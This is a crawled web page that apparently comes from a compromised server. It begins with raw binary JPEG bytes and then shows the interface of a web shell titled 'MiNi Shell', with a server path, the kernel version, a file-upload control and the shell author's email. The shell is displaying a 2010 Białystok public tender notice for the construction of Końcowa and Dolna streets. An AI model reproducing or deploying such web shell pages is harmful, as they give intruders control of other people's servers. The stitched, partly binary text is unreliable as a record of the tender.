JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/10967-N-2010.html

<p class="kh_header"><b>Białystok: Budowa ulic: Końcowej i Dolnej na osiedlu Zawady wraz z budową i przebudową niezbędnej infrastruktury.</b><br>
<b>Numer ogłoszenia: 10967 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ulic: Końcowej i Dolnej na osiedlu Zawady wraz z budową i przebudową niezbędnej infrastruktury..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia
1.	Przedmiotem zamówienia jest:
a)Budowa ulicy  Dolnej w Białymstoku wraz z budową i przebudową  niezbędnej infrastruktury technicznej polegającej na:
 - wykonaniu nawierzchni jezdni  dla ruchu lekko-średniego KR1 z kostki brukowej betonowej grub.8 cm., na podbudowie z kruszywa naturalnego stabilizowanego mechanicznie z dodatkiem 18% kruszywa łamanego grub. 22 cm. I warstwie wzmocnionego podłoża z gruntu stabilizowanego cementem o Rm=1,5 MPa grub. 10 cm. Przy podłożu G2, o RM-2,5 MPa grub. 15 cm. przy podłożu G3 lub o RM=2,5 MPa grub. 25 cm. przy podłożu G4. Długość ulicy Dolnej, w osiach ulic przyległych wynosi 1 112,4 m. szerokość ulicy w liniach rozgraniczających wynosi 9-10m.
- budowie wjazdów z kostki brukowej betonowej na podbudowie z kruszywa naturalnego stabilizowanego mechanicznie grub. 12 cm.
      -  budowie chodników z płyt betonowych chodnikowych wibroprasowanych 35x35x5 cm.
      - budowie i przebudowie kanalizacji deszczowej w ulicy oraz budowę przyłączy do wpustów       ulicznych,
    - budowie oświetlenia ulicznego. Długość projektowanej napowietrznej linii oświetlenia
 L=654 m. Na odcinku gdzie istnieje napowietrznia linia NN oświetlenie zaprojektowano   poprzez dowieszenie projektowanego przewodu oświetleniowego AsXSn 4x35 mm2.
 - przebudowie kolidującej z budową jezdni sieci telekomunikacyjnej. Długość trasowa   projektowanych rozdzielczych kabli miedzianych w kanalizacji wynosi 248 m, a doziemnych 1445 m , natomiast abonenckich kabli doziemnych 998 m, a napowietrznych 110 m.
    
b)	Budowa ulicy  Końcowej na odcinku od ul. Dolnej do ul. Lodowej w Białymstoku wraz z budową i przebudową  niezbędnej infrastruktury technicznej polegającej na:
- budowie nawierzchni z kostki brukowej betonowej na odcinku od ul. Dolnej do skrzyżowania z ul. Zawady. Powierzchnia nawierzchni z kostki brukowej betonowej ok. 1104 m2. Na pozostałym odcinku ulicy do skrzyżowania z ul. Lodową, ulica Końcowa będzie posiadała nawierzchnię  asfaltową. Powierzchnia nawierzchni asfaltowej ok. 3169 m2. Ulica Końcowa posiada kategorie ruchu KR3. szerokość ulicy Końcowej -6,0 m. 
- budowie zjazdów z kostki brukowej betonowej  w kolorze czerwonym o grub. 8 cm,  na  podsypce cementowo-piaskowej grub. 5 cm. Powierzchnie projektowanych zjazdów 
ok. 494 m2. 
     - budowie chodników z płyt betonowych chodnikowych wibroprasowanych 35x35x5 cm. powierzchnie projektowanych chodników ok. 2254 m2.
     -  budowie kanału deszczowego wraz z wpustami i przykanalikami,
     -  budowie gazociągu z rur PE 100  szeregu SDR 17,6 dla średnic od d32 i PE80 szeregu SDR 11 dla średnic do d110,
     - budowie oświetlenia ulicznego. Nowe oświetlenie wykonać podwieszając przewód oświetleniowy typu AsXSn na projektowanych słupach komunalnej elektroenergetycznej napowietrznej linii NN. 
       - przebudowie kolidującej z budową jezdni kanalizacji teletechnicznej. Urządzenia teletechniczne należy przebudować w sposób nie powodujący przerw w ruchu telekomunikacyjnym tj. budowie infrastruktury obejściowej w dowiązaniu do istniejących elementów sieci wraz z kablami miedzianymi i kablem światłowodowym
2. Szczegółowy opis zamówienia przedstawiono w dokumentacji projektowej oraz szczegółowych specyfikacjach technicznych opracowanych przez Firmę STRADA oraz PROLUS w Białymstoku, stanowiących załączniki do niniejszej SIWZ.
3.  Zamawiający wymaga udzielenia, co najmniej, 3-letniej gwarancji na wykonane prace.
4. Podane w dokumentacji projektowej nazwy lub typy materiałów i produktów mają na celu wskazanie parametrów jakościowych. W przypadku materiałów i produktów określonych w dokumentacji projektowej nazwą producenta, Zamawiający dopuszcza zastosowanie materiałów równoważnych zgodnie z art. 29 ust. 3 ustawy. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego zobowiązany jest do wypełnienia wymogu wynikającego z art. 30 ust. 5 ustawy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium o wartości  10 000,00  zł słownie: dziesięć tysięcy złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki określone 
w art. 22 ust. 1 pkt 1-4 ustawy, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2)	posiadania wiedzy i doświadczenia
- zrealizowali w ostatnich 5 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy w tym okresie,  co najmniej 3 zamówienia na roboty w zakresie budowy lub przebudowy drogi o wartości 500 000,00 zł. każde, potwierdzone dokumentami stwierdzającymi należyte wykonanie;

3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
            - dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi 
            uprawnienia niezbędne do wykonania przedmiotu zamówienia, wymagane przepisami ustawy z 
            dnia 7 lipca 1994r. Prawo budowlane w specjalności drogowej, instalacyjnej  w zakresie sieci 
             kanalizacyjnych należącymi do właściwej izby samorządu zawodowego.

4)	sytuacji ekonomicznej i finansowej 
       - posiadają polisę lub inny dokument ubezpieczeniowy, potwierdzający, że wykonawca jest       ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
1.	Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia.
2.	Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty wymagane w ofercie :
1)	formularz ofertowy (wg załącznika nr 1 do SIWZ ) z zestawieniem kosztów (załącznik Nr 1A do SIWZ );
2)	uproszczony kosztorys ofertowy (zawierający ilość robot, cenę jednostkową oraz wartość pozycji sporządzony na podstawie dokumentacji projektowej i przedmiarów robót, obejmujący wszystkie pozycje przedmiarów, zestawienie zawierające wykaz procentowych wskaźników cenotwórczych (Koszty Ogólne, Koszty Zakupu, Zyski), stawkę roboczogodziny, zestawienie cen jednostkowych materiałów i sprzętu,  
    3)  oświadczenie o udzieleniu 3-letniej gwarancji;
    4)  pełnomocnictwo - w przypadku, gdy oferta została podpisana przez  pełnomocnika  lub   gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia  zgodnie z art. 23  ustawy.
2.  Dowód wniesienia wadium w kwocie 10 000,00 zł
3. Dokumenty i oświadczenia potwierdzające spełnienie warunków udziału w postępowaniu i wykazujące brak podstaw do wykluczenia:
1)	  aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 m-cy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w  stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy 
2)	oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22, ust. 1 pkt 1-3 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych i o nie podleganiu wykluczeniu z postępowania zgodnie z art. 24 ust. 1 i 2 (wg załącznika nr 2 SIWZ);
3)	aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4)	aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że Wykonawca uzyskał przewidzianą prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5)	opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;
6)  wykaz zamówień (minimum 3) zrealizowanych przez Wykonawcę w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie na roboty w zakresie budowy lub przebudowy drogi o wartości 500 000,00 zł. każde, zawierający zakres, wartość, termin i miejsce realizacji, wraz z dokumentami potwierdzającymi wykonanie robót zgodnie z zasadami sztuki budowlanej i prawidłowym ukończeniem ( zgodnie z tabelą załącznik nr 3 SIWZ),
     7)    wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacją na temat  
            zakresu wykonywanych czynności oraz  informacją  o podstawie do dysponowania tymi osobami   
           (zgodnie z załącznikiem 4SIWZ)
     8 )  oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają   
          wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień(zgodnie      
          z załącznikiem nr 4 a SIWZ)

Zgodnie z art. 26 ust 2b) i 2c) ustawy pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów  do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
4.  W przypadku wykonawców  wspólnie ubiegających  się o udzielenie zamówienia :
 1)  każdy  wykonawca  zobowiązany jest złożyć oddzielnie  dokumenty określone w pkt. 3, ppkt. 1, 3, 4, 
 2) warunki dotyczące wymaganego doświadczenia, posiadanego potencjału technicznego i osobowego oraz sytuacji ekonomiczno - finansowej badane będą łącznie - dokumenty określone pkt. 3, ppkt. 5,6,7,8 winien złożyć co najmniej jeden z wykonawców wspólnie ubiegających się
o udzielenie zamówienia,   
 3) oświadczenie o spełnieniu warunków udziału w postępowaniu i niepodleganiu wykluczeniu określone w pkt. 3 ppkt. 2 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie. 
5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 3, ppkt. 1, 3, 4 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, zgodnie z § 4 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Inwestycji Miejskich Urzędu Miejskiego w Białymstoku, ul. Składowa 11, (sekretariat)  15-950 Białystok.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2010 godzina 08:45, miejsce: Zarząd Dróg i Inwestycji Miejskich Urzędu Miejskiego w Białymstoku, ul. Składowa 11, (sekretariat) 
 15-950 Białystok.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com